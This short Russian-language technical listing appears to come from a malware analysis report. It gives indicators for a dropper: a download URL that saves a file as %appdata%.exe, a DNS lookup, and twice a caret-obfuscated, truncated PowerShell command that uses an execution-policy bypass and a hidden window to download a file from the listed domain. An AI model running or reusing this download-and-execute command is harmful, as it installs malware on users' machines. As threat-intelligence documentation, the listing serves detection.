Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POweR^ShE^l^L.e^Xe ^-^eXEC^UtI^o^nP^oL^I^c^y^ by^PaSS ^-NOp^R^o^F^iL^E -WiNdow^S^TY^L^E^ ^HI^Dden (NEw-O^BJ^E^cT S^ysTEM.neT^.WEBClIEnt^).dOWNloa^d^f^ile('http://www.zonedopesa...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /C "POweR^ShE^l^L.e^Xe ^-^eXEC^UtI^o^nP^oL^I^c^y^ by^PaSS ^-NOp^R^o^F^iL^E -WiNdow^S^TY^L^E^ ^HI^Dden (NEw-O^BJ^E^cT S^ysTEM.neT^.WEBClIEnt^).dOWNloa^d^f^ile('http://www.zonedopesa...' (со скрытым окном)